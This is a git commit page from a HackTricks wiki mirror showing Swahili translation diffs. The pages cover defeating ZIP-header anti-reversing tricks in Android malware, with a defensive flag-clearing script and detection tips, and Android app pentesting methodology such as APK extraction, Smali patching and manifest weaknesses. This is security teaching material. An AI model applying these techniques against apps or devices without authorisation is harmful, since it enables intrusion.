maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-web/file-inclusion/lfi2rce-via-php-filte

Browse Source
This commit is contained in:
Translator 2025-09-04 01:04:45 +00:00
parent 19a08f127b
commit 64ad895e9c
17 changed files with 1745 additions and 1743 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

74
src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
View File

@ -2,29 +2,29 @@
{{#include ../../../banners/hacktricks-training.md}}
**Command-line tools** za kusimamia **zip files** ni muhimu kwa uchunguzi, ukarabati, na kuvunja zip files. Hapa kuna utiliti kuu:
**Command-line tools** za kusimamia **zip files** ni muhimu kwa kutambua matatizo, kurekebisha, na kuvunja zip files. Hapa kuna zana kuu:
- **`unzip`**: Inaonyesha kwa nini faili ya zip inaweza kushindwa kutolewa.
- **`zipdetails -v`**: Inatoa uchambuzi wa kina wa mashamba ya muundo wa zip file.
- **`zipinfo`**: Inaorodhesha yaliyomo ya zip file bila kuyatoa.
- **`zip -F input.zip --out output.zip`** na **`zip -FF input.zip --out output.zip`**: Jaribu kurekebisha zip files zilizo haribika.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Chombo cha brute-force kuvunja nywila za zip, kinachofaa kwa nywila hadi takriban herufi 7.
- **`unzip`**: Inaonyesha kwa nini zip file inaweza isiweze kutolewa.
- **`zipdetails -v`**: Inatoa uchanganuzi wa kina wa mashamba ya format ya zip file.
- **`zipinfo`**: Hutoa orodha ya yaliyomo kwenye zip file bila kuyatoa.
- **`zip -F input.zip --out output.zip`** na **`zip -FF input.zip --out output.zip`**: Jaribu kutengeneza tena zip files zilizoharibika.
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Zana ya brute-force kuvirusha password za zip, inayofanya kazi vizuri kwa password za takriban herufi 7 au chini.
The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) inatoa maelezo kamili juu ya muundo na viwango vya zip files.
The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) inatoa maelezo ya kina juu ya muundo na viwango vya zip files.
Ni muhimu kutambua kwamba zip files zilizolindwa kwa nywila hazifichi majina ya faili au ukubwa wa faili ndani yao, kosa la usalama ambalo halitokei kwenye RAR au 7z ambazo huficha taarifa hizi. Zaidi ya hayo, zip files zilizoencrypted kwa njia ya zamani ya ZipCrypto zina uwezekano wa kufahamika kwa plaintext attack ikiwa nakala isiyofichwa ya faili iliyofinyangwa inapatikana. Shambulio hili linatumia yaliyomo yanayojulikana kuvunja nywila ya zip, udhaifu uliobainishwa katika makala ya HackThis na umeelezewa zaidi katika karatasi hii ya kitaaluma. Hata hivyo, zip files zilizo secured kwa AES-256 zina kinga dhidi ya plaintext attack, ikionyesha umuhimu wa kuchagua mbinu salama za encryption kwa data nyeti.
Ni muhimu kutambua kwamba zip files zilizo na password zinalindwa kwa njia ya password **hazifichi majina ya faili au ukubwa wa faili** ndani yao, kasoro ya usalama ambayo haishirikiani na RAR au 7z ambazo huweka siri taarifa hizi. Zaidi ya hayo, zip files zilizoingia na njia ya zamani ya ZipCrypto zinaweza kushambuliwa kwa kutumia plaintext attack ikiwa kuna nakala isiyofichwa ya faili iliyoshinikwa. Shambulio hili linatumia yaliyomo yanayojulikana kuvunja password ya zip, udhaifu ulioelezewa kwenye [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) na kufafanuliwa zaidi katika [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). Hata hivyo, zip files zilizolindwa kwa **AES-256** ni salama dhidi ya plaintext attack hii, ikionyesha umuhimu wa kuchagua mbinu salama za encryption kwa data nyeti.
---
## Anti-reversing tricks in APKs using manipulated ZIP headers
## Mbinu za anti-reversing katika APKs kwa kutumia vichwa vya ZIP vilivyobadilishwa
Modern Android malware droppers hutumia metadata ya ZIP iliyofomatiwa vibaya kuvunja zana za static (jadx/apktool/unzip) huku wakihakikisha APK inaweza kusakinishwa kwenye kifaa. Mbinu zinazotumika mara kwa mara ni:
Malware droppers ya kisasa ya Android hutumia metadata ya ZIP iliyofanywa vibaya kuvunja zana za static (jadx/apktool/unzip) huku wakiruhusu APK kusakinishwa kifaa. Mbinu zinazotumika mara kwa mara ni:
- Ulaghai wa encryption kwa kuweka ZIP General Purpose Bit Flag (GPBF) bit 0
- Kutumia Extra fields kubwa/za custom kuvuruga parsers
- Migongano ya majina ya faili/directory kuficha artefact halisi (mfano, directory liitwalo `classes.dex/` kando ya `classes.dex` halisi)
- Fake encryption kwa kuweka ZIP General Purpose Bit Flag (GPBF) bit 0
- Kutumia Extra fields kubwa/maalum kuchanganya parsers
- Mgongano wa majina ya faili/dirctory kuficha artifacts halisi (mfano, directory yenye jina `classes.dex/` kando ya `classes.dex` halisi)
### 1) Fake encryption (GPBF bit 0 set) without real crypto
### 1) Fake encryption (GPBF bit 0 set) bila kripto halisi
Dalili:
- `jadx-gui` inashindwa na makosa kama:
@ -32,7 +32,7 @@ Dalili:
```
java.util.zip.ZipException: invalid CEN header (encrypted entry)
```
- `unzip` inauliza nywila kwa faili kuu za APK ingawa APK halali haiwezi kuwa na `classes*.dex`, `resources.arsc`, au `AndroidManifest.xml` zilizofichwa:
- `unzip` inauliza password kwa faili kuu za APK ingawa APK halali haiwezi kuwa na `classes*.dex`, `resources.arsc`, au `AndroidManifest.xml` zilizofichwa kwa siri:
```bash
unzip sample.apk
@ -43,11 +43,11 @@ skipping: resources.arsc/res/domeo/eqmvo.xml incorrect password
skipping: classes2.dex incorrect password
```
Uchunguzi kwa kutumia zipdetails:
Uchunguzi kwa zipdetails:
```bash
zipdetails -v sample.apk | less
```
Angalia General Purpose Bit Flag kwa vichwa vya local na central. Thamani inayofichua ni bit 0 imewekwa (Encryption) hata kwa core entries:
Tazama General Purpose Bit Flag kwa local na central headers. Thamani inayoonyesha ni bit 0 imewekwa (Encryption) hata kwa core entries:
```
Extract Zip Spec 2D '4.5'
General Purpose Flag 0A09
@ -56,9 +56,9 @@ General Purpose Flag 0A09
[Bit 3] 1 'Streamed'
[Bit 11] 1 'Language Encoding'
```
Heuristiki: Ikiwa APK inasakinishwa na inaendesha kwenye kifaa lakini core entries zinaonekana "encrypted" kwa zana, GPBF ilibadilishwa.
Heuristiki: Ikiwa APK inasakinishwa na inakimbia kwenye kifaa lakini ingizo za msingi zinaonekana "encrypted" kwa zana, GPBF iliharibishwa.
Rekebisha kwa kuweka bit 0 ya GPBF kuwa 0 kwenye entries zote za Local File Headers (LFH) na Central Directory (CD). Minimal byte-patcher:
Tengeneza kwa kufuta bit 0 ya GPBF katika Local File Headers (LFH) na Central Directory (CD) entries. Minimal byte-patcher:
```python
# gpbf_clear.py clear encryption bit (bit 0) in ZIP local+central headers
import struct, sys
@ -94,31 +94,33 @@ Matumizi:
python3 gpbf_clear.py obfuscated.apk normalized.apk
zipdetails -v normalized.apk | grep -A2 "General Purpose Flag"
```
Sasa unapaswa kuona `General Purpose Flag 0000` kwenye core entries na tools zitachakata APK tena.
Sasa unapaswa kuona `General Purpose Flag 0000` kwenye core entries na zana zitasoma APK tena.
### 2) Large/custom Extra fields to break parsers
### 2) Large/custom Extra fields za kuvunja parsers
Wavamizi huingiza Extra fields zilizo kubwa mno na IDs zisizo za kawaida ndani ya headers ili kuwapotosha decompilers. Katika mazingira halisi unaweza kuona alama za custom (kwa mfano, strings kama `JADXBLOCK`) zikiwa zimeingizwa pale.
Wavamizi huingiza Extra fields zilizo kubwa sana na IDs zisizo za kawaida kwenye headers ili kuwapotosha decompilers. Katika mazingira halisi unaweza kuona custom markers (kwa mfano, strings kama `JADXBLOCK`) zimeingizwa hapo.
Uchunguzi:
```bash
zipdetails -v sample.apk | sed -n '/Extra ID/,+4p' | head -n 50
```
Mifano iliyobainika: vitambulisho visivyojulikana kama `0xCAFE` ("Java Executable") au `0x414A` ("JA:") vinabeba mizigo mikubwa.
Mifano yaliyobainika: vitambulisho visivyojulikana kama `0xCAFE` ("Java Executable") au `0x414A` ("JA:") vinabeba payload kubwa.
DFIR heuristics:
- Onyo wakati Extra fields ni kubwa kupita kiasi kwenye core entries (`classes*.dex`, `AndroidManifest.xml`, `resources.arsc`).
- Chukulia Extra IDs zisizojulikana kwenye entries hizi kama zenye shaka.
Miongozo ya DFIR:
- Toa tahadhari wakati Extra fields zinapokuwa zisizo za kawaida kwa ukubwa kwenye core entries (`classes*.dex`, `AndroidManifest.xml`, `resources.arsc`).
- Chukulia Extra IDs zisizojulikana kwenye entries hizo kama zenye shaka.
Kukabiliana kwa vitendo: kujenga tena archive (mf. re-zipping faili zilizotolewa) huondoa Extra fields zenye uharibifu. Ikiwa zana zinakataa kutoa kwa sababu ya fake encryption, kwanza clear GPBF bit 0 kama hapo juu, kisha repackage:
Uzuiaji wa vitendo: kujenga upya archive (mfano, re-zipping extracted files) huondoa Extra fields zenye uovu. Ikiwa zana zinakataa kutoa kwa sababu ya fake encryption, kwanza futa GPBF bit 0 kama ilivyoelezwa hapo juu, kisha repack:
```bash
mkdir /tmp/apk
unzip -qq normalized.apk -d /tmp/apk
(cd /tmp/apk && zip -qr ../clean.apk .)
```
### 3) Mgongano wa majina ya Faili/Saraka (kuficha hati halisi)
### 3) Mgongano ya majina ya faili/saraka (kuficha artifacts halisi)
A ZIP inaweza kuwa na faili `X` na pia saraka `X/`. Baadhi ya extractors na decompilers huchanganyikiwa na zinaweza kuifunika au kuficha faili halisi kwa kiingizo cha saraka. Hii imeonekana kwa vile kiingizo kinapogongana na majina ya msingi ya APK kama `classes.dex`.
ZIP inaweza kuwa na faili `X` na saraka `X/`. Baadhi ya extractors na decompilers huchanganyikiwa na zinaweza ku-overlay au kuficha faili halisi kwa kuingia kwa saraka. Hii imeonekana ikitokea kwa maingizo yanapogongana na majina ya msingi ya APK kama `classes.dex`.
Uainishaji na uchimbaji salama:
Triage na uchimbaji salama:
```bash
# List potential collisions (names that differ only by trailing slash)
zipinfo -1 sample.apk | awk '{n=$0; sub(/\/$/,"",n); print n}' | sort | uniq -d
@ -129,7 +131,7 @@ unzip normalized.apk -d outdir
# replace outdir/classes.dex? [y]es/[n]o/[A]ll/[N]one/[r]ename: r
# new name: unk_classes.dex
```
Kiambishi cha mwisho kwa ugunduzi wa kimaprogremu:
Kiambishi cha baada (post-fix) cha utambuzi wa kimaprogramu:
```python
from zipfile import ZipFile
from collections import defaultdict
@ -146,14 +148,14 @@ for base, variants in collisions.items():
if len(variants) > 1:
print('COLLISION', base, '->', variants)
```
Mapendekezo za utambuzi kwa Blue-team:
- Bainisha APKs zilizo na vichwa vya ndani vinavyoonyesha encryption (GPBF bit 0 = 1) lakini bado zinasakinishwa/kukimbia.
- Bainisha Extra fields kubwa/zisizojulikana kwenye core entries (tafuta alama kama `JADXBLOCK`).
- Bainisha path-collisions (`X` and `X/`) hasa kwa `AndroidManifest.xml`, `resources.arsc`, `classes*.dex`.
Mapendekezo ya utambuzi kwa timu ya Blue:
- Alama APK ambazo vichwa vya ndani vinaonyesha encryption (GPBF bit 0 = 1) lakini zinasakinishwa/zinakimbia.
- Alama mawanja ya ziada makubwa/ yasiyojulikana kwenye ingizo za msingi (tazama alama kama `JADXBLOCK`).
- Alama mgongano wa njia (`X` na `X/`) hasa kwa `AndroidManifest.xml`, `resources.arsc`, `classes*.dex`.
---
## Marejeleo
## Marejeo
- [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
- [GodFather Part 1 A multistage dropper (APK ZIP anti-reversing)](https://shindan.io/blog/godfather-part-1-a-multistage-dropper)

555
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

487
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -1,10 +1,10 @@
# Programu za Android Pentesting
# Android Applications Pentesting
{{#include ../../banners/hacktricks-training.md}}
## Misingi ya Programu za Android
## Android Applications Basics
Inashauriwa sana kuanza kusoma ukurasa huu ili kujue kuhusu **sehemu muhimu zaidi zinazohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
Inashauriwa sana kuanza kusoma ukurasa huu ili kujua kuhusu **sehemu muhimu zaidi zinazohusiana na usalama wa Android na vipengele hatari zaidi katika programu ya Android**:
{{#ref}}
@ -13,24 +13,24 @@ android-applications-basics.md
## ADB (Android Debug Bridge)
Hii ni zana kuu unayohitaji kuunganisha na kifaa cha Android (kilichoiga au cha kimwili).\
**ADB** inaruhusu kudhibiti vifaa kupitia **USB** au **mtandao** kutoka kwa kompyuta. Huduma hii inafanya iwezekane **kunakili** faili kwa pande zote mbili, **kusakinisha** na **kuondoa** apps, **kutekeleza** amri za shell, **kutengeneza nakala (backup)** za data, **kusoma** logi, pamoja na kazi nyingine.
Hii ni zana kuu unayohitaji kuunganishwa na kifaa cha Android (emulated au halisi).\
**ADB** inaruhusu kudhibiti vifaa kwa njia ya **USB** au **Network** kutoka kwenye kompyuta. Kifaa hiki kinawezesha **kunakili** mafaili pande zote mbili, **kusakinisha** na **kuondoa** apps, **kutekeleza** amri za shell, **kufanya backup** ya data, **kusoma** logi, pamoja na kazi nyingine.
Tazama orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili kujifunza jinsi ya kutumia adb.
Angalia orodha ifuatayo ya [**ADB Commands**](adb-commands.md) ili kujifunza jinsi ya kutumia adb.
## Smali
Wakati mwingine ni vyema **kubadilisha msimbo wa programu** ili kupata **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flagi). Kisha, inaweza kuwa muhimu ku-decompile apk, kubadilisha msimbo na ku-recompile tena.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa muhimu kama **mbadala kwa vipimo kadhaa wakati wa uchambuzi wa dynamic** utakaowasilishwa. Basi, **kumbuka kila wakati uwezekano huu**.
Wakati mwingine ni muhimu **kubadilisha msimbo wa programu** ili kupata **taarifa zilizofichwa** (labda nywila zilizofichwa vizuri au flagi). Kwa hivyo, inaweza kuwa muhimu ku-decompile APK, kubadilisha msimbo na kuirecompile.\
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). Hii inaweza kuwa msaada mkubwa kama **mbadala kwa vipimo kadhaa wakati wa dynamic analysis** vitakavyoonyeshwa. Kwa hivyo, **kumbuka daima uwezekano huu**.
## Mbinu nyingine za kuvutia
## Other interesting tricks
- [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
- [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)
- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Toa APK kutoka kifaa:
- Extract APK from device:
```bash
adb shell pm list packages
com.android.insecurebankv2
@ -49,7 +49,7 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk
# after merging, you will need to align and sign the apk, personally, I like to use the uberapksigner
java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```
## Mifano ya Kesi na Udhaifu
## Case Studies & Vulnerabilities
{{#ref}}
@ -61,41 +61,41 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}
## Uchambuzi wa Statiki
## Static Analysis
Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama msimbo wa Java** kwa kutumia decompiler.\
Please, [**read here to find information about different available decompilers**](apk-decompilers.md).
Kwanza kabisa, kwa kuchambua APK unapaswa **kuangalia msimbo wa Java** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers tofauti zinazopatikana**](apk-decompilers.md).
### Kutafuta Taarifa Zinazovutia
### Looking for interesting Info
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwa app).
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwenye app).
**Firebase**
Lipa kipaumbele maalum kwa **firebase URLs** na angalia ikiwa imekonfiguriwa vibaya. [More information about whats is FIrebase and how to exploit it here.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
Lipa umakini maalum kwa **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya kuitumia hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
### Uelewa wa Msingi wa programu - Manifest.xml, strings.xml
### Basic understanding of the application - Manifest.xml, strings.xml
Ukaguzi wa faili za programu _Manifest.xml_ na _strings.xml_ unaweza kubaini udhaifu wa usalama. Faili hizi zinaweza kupatikana kwa kutumia decompilers au kwa kubadilisha extension ya faili ya APK kuwa .zip kisha kuizipisha.
Uchunguzi wa faili za programu za _Manifest.xml_ na **_strings.xml_** unaweza kufichua udhaifu wa usalama. Faili hizi zinaweza kufikiwa kwa kutumia decompilers au kwa kubadilisha extension ya faili ya APK kuwa .zip kisha kuizikamua.
Udhaifu unaobainika kutoka Manifest.xml ni pamoja na:
**Vulnerabilities** zilizotambulika kutoka kwa **Manifest.xml** ni pamoja na:
- **Maombi yanayoweza ku-debug (Debuggable Applications)**: Maombi yaliyowekwa kama `debuggable="true"` katika _Manifest.xml_ yanaweza kuwapo kwa hatari kwa sababu yanaruhusu muunganisho ambao unaweza kusababisha exploitation. Kwa uelewa zaidi kuhusu jinsi ya ku-exploit applications zilizo set kama debuggable, angalia tutorial za kutafuta na ku-exploit applications debuggable kwenye kifaa.
- **Mipangilio ya Backup**: Attribute `android:allowBackup="false"` inapaswa kuwekwa wazi kwa applications zinazoendesha habari nyeti ili kuzuia backups zisizoidhinishwa za data kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Custom network security configurations (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ zinaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domain maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components ambazo zinaweza kutumika vibaya. Uchambuzi zaidi wakati wa dynamic testing unaweza kubaini jinsi ya ku-exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizo wazi zinaweza kuruhusu upatikanaji usioidhinishwa au marekebisho ya data. Muundo wa FileProviders pia unapaswa kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, hasa kwa kuzingatia jinsi URL schemes zinavyosimamiwa kwa ajili ya udhaifu wa input.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha matoleo ya Android yanayotumika, zikibainisha umuhimu wa kutojisikia kwa matoleo ya Android yasiyokuwa salama kwa sababu za usalama.
- **Debuggable Applications**: Programu zilizowekwa kama debuggable (`debuggable="true"`) katika _Manifest.xml_ zina hatari kwa sababu zinaruhusu muunganisho ambao unaweza kusababisha exploitation. Kwa uelewa zaidi juu ya jinsi ya kutumia programu debuggable, rejea mafunzo juu ya kutafuta na kushambulia debuggable applications kwenye kifaa.
- **Backup Settings**: Sifa `android:allowBackup="false"` inapaswa kuwekwa wazi kwa programu zinazoshughulikia taarifa nyeti ili kuzuia backups zisizoidhinishwa kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Custom network security configurations (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ zinaweza kueleza undani wa usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha vipengele vinavyoweza kutumiwa vibaya. Uchambuzi zaidi wakati wa dynamic testing unaweza kufichua jinsi ya kushambulia vipengele hivi.
- **Content Providers and FileProviders**: Content providers zilizo wazi zinaweza kuruhusu ufikiaji usioidhinishwa au urekebishaji wa data. Usanidi wa FileProviders pia unapaswa kuchunguzwa kwa makini.
- **Broadcast Receivers and URL Schemes**: Vipengele hivi vinaweza kutumiwa kwa exploitation, na umakini maalum unapaswa kuwekwa jinsi URL schemes zinavyosimamiwa kwa ajili ya input vulnerabilities.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha matoleo ya Android yanayounga mkono, yakionyesha umuhimu wa kutoendelea kuunga mkono matoleo ya zamani na yenye udhaifu kwa sababu za usalama.
Kutoka kwa faili ya **strings.xml**, habari nyeti kama API keys, custom schemas, na maelezo mengine ya developer zinaweza kugunduliwa, ikisisitiza haja ya kupitia rasilimali hizi kwa uangalifu.
Kutoka kwa faili ya **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer zinaweza kugunduliwa, ikisisitiza umuhimu wa ukaguzi wa makini wa rasilimali hizi.
### Tapjacking
Tapjacking ni attack ambapo malicious application inazinduliwa na kujipanga juu ya victim application. Mara inapofunika kwa muonekano victim app, user interface yake imeundwa kwa njia ya kumdanganya mtumiaji kuingiliana nayo, wakati inapipitisha interaction hiyo kwa victim app.\
Kwa vitendo, inamficha mtumiaji kutoka kujua kwamba kwa kweli anatekeleza vitendo kwenye victim app.
**Tapjacking** ni shambulio ambapo **malicious** **application** inazinduliwa na **kujipangia juu ya application ya mwathiriwa**. Mara inapoificha app ya mwathiriwa, kiolesura chake kimeundwa kwa njia inayodanganya mtumiaji kuingiliana nayo, wakati kiingiliano hicho kinapitishwa kwa app ya mwathiriwa.\
Kwa ufanisi, inamficha mtumiaji ili asijue kuwa kwa kweli anafanya vitendo kwenye app ya mwathiriwa.
Find more information in:
Pata habari zaidi katika:
{{#ref}}
@ -104,9 +104,9 @@ tapjacking.md
### Task Hijacking
Activity yenye `launchMode` iliyowekwa kwa `singleTask` bila `taskAffinity` yoyote iliyotajwa ni nyeti kwa task Hijacking. Hii inamaanisha kwamba application inaweza kusanikishwa na ikiwa itazinduliwa kabla ya application halisi inaweza hijack task ya application halisi (hivyo mtumiaji atakuwa akishirikiana na malicious application akidhani anatumia ile halisi).
Activity yenye **`launchMode`** imewekwa kwa **`singleTask` bila `taskAffinity`** yoyote iliyobainishwa ni nyeti kwa task Hijacking. Hii ina maana kwamba, application inaweza kusakinishwa na ikiwa itaendeshwa kabla ya application halisi inaweza **hijack task ya application halisi** (hivyo mtumiaji atakuwa akishirikiana na **malicious application akidhani anatumia ile halisi**).
More info in:
Taarifa zaidi katika:
{{#ref}}
@ -117,69 +117,69 @@ android-task-hijacking.md
**Internal Storage**
Katika Android, faili zilizohifadhiwa katika internal storage zimeundwa zilipwe kupatikana kikamilifu na app iliyozizalisha. Hatua hii ya usalama inatekelezwa na mfumo wa uendeshaji wa Android na kwa kawaida ni ya kutosha kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers wakati mwingine hutumia mode kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu faili kushirikiwa kati ya applications tofauti. Mode hizi hazizuizi upatikanaji wa faili hizi na applications nyingine, pamoja na zile ambazo zinaweza kuwa malicious.
Katika Android, faili zilizohifadhiwa katika **internal** storage zimetengenezwa kuwa zinapatikana mahsusi kwa **app** iliyozianzisha. Hatua hii ya usalama inatekelezwa na mfumo wa uendeshaji wa Android na kwa kawaida inatosheleza mahitaji ya usalama ya programu nyingi. Hata hivyo, waendelezaji wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu faili kushirikiwa kati ya applications mbalimbali. Modes hizi hata hivyo **hazizuizi ufikiaji** wa faili hizi na applications nyingine, ikiwa ni pamoja na zile zinazoweza kuwa zenye malice.
1. **Uchambuzi wa Statiki:**
- **Hakikisha** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yamechunguzwa kwa uangalifu. Mode hizi **zinaweza kuonyesha** faili kwa **upatikanaji usiotarajiwa au usioidhinishwa**.
2. **Uchambuzi wa Dinamiki:**
- **Thibitisha** **permissions** zilizowekwa kwenye faili zilizoundwa na app. Hasa, **kagua** kama kuna faili zilizowekwa kuwa **zinazosomwa au zinaandikwa na kila mtu**. Hii inaweza kuleta hatari kubwa ya usalama, kwani itamruhusu **application yoyote** iliyowekwa kwenye kifaa, bila kujali chanzo au nia yake, **kusoma au kubadilisha** faili hizi.
1. **Static Analysis:**
- **Hakikisha** matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Modes hizi **zinaweza kuonyesha** faili kwa ufikiaji usiokusudiwa au usioidhinishwa.
2. **Dynamic Analysis:**
- **Thibitisha** ruhusa zilizowekwa kwenye faili zilizotengenezwa na app. Haswa, **angalia** kama faili yoyote imewekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **programu yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili au nia yake, kusoma au kurekebisha faili hizi.
**External Storage**
Unaposhughulika na faili kwenye external storage, kama SD Cards, tahadhari zifuatazo zinapaswa kuchukuliwa:
Unapotumia faili kwenye **external storage**, kama SD Cards, tahadhari zifuatazo zinapaswa kuchukuliwa:
1. **Upatikanaji**:
- Faili kwenye external storage ni **zinazosomwa na kuandikwa kwa ulimwengu mzima**. Hii inamaanisha application yoyote au mtumiaji anaweza kufikia faili hizi.
2. **Masuala ya Usalama**:
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kutoihifadhi habari nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na application yoyote, ikifanya isiwe salama.
3. **Kushughulikia Data kutoka External Storage**:
- Daima **fanya validation ya input** kwa data inayopelekwa kutoka external storage. Hii ni muhimu kwa sababu data hiyo inatokana na chanzo kisichoaminika.
- Kuhifadhi executable au class files kwenye external storage kwa ajili ya dynamic loading inaachwa kwa hatari kubwa.
- Ikiwa application yako lazima ipate faili za executable kutoka external storage, hakikisha faili hizi zimesainiwa na kuthibitishwa kihasabu kabla ya kuzichukua kwa dynamic. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
1. **Accessibility**:
- Faili kwenye external storage ni **globally readable and writable**. Hii inamaanisha programu yoyote au mtumiaji anaweza kufikia faili hizi.
2. **Security Concerns**:
- Kutokana na urahisi wa ufikiaji, inadokezwa **kuto hifadhi taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na programu yoyote, ikifanya isiwe salama.
3. **Handling Data from External Storage**:
- Daima **fanya input validation** kwenye data inayorekebishwa kutoka external storage. Hii ni muhimu kwa sababu data ni kutoka chanzo kisichoaminika.
- Kuingiza executables au class files kwenye external storage kwa ajili ya dynamic loading inachukuliwa kuwa hatari na haipendekezwi.
- Ikiwa application yako lazima ipate faili za executable kutoka external storage, hakikisha faili hizi zimesainiwa na kuthibitishwa kwa cryptographic kabla ya kupakiwa kwa dynamic. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
External storage inaweza kufikika katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
External storage inaweza kufikiwa katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
> [!TIP]
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directories ambao unapunguza upatikanaji kutoka kwa app hadi directory iliyobuniwa kwa ajili ya app hiyo pekee. Hii inazuia malicious application kupata upatikanaji wa kusoma au kuandika faili za app nyingine.
> Kuanzia na Android 4.4 (**API 17**), SD card ina muundo wa directories ambao **unapunguza ufikiaji kutoka kwa app hadi directory ambayo ni maalum kwa app hiyo**. Hii inazuia application hasidi kupata ufikiaji wa kusoma au kuandika kwa faili za app nyingine.
**Sensitive data stored in clear-text**
- **Shared preferences**: Android inaruhusu kila application kuhifadhi kwa urahisi faili za xml katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi kwa urahisi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Shared preferences**: Android inaruhusu kila application kuhifadhi faili za xml kwa urahisi katika path `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi sqlite databases kwa urahisi katika path `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
### Broken TLS
**Accept All Certificates**
Kwa sababu fulani, wakati mwingine developers wanakubali certificates zote hata kama kwa mfano hostname haifanani, kwa mistari ya code kama ifuatayo:
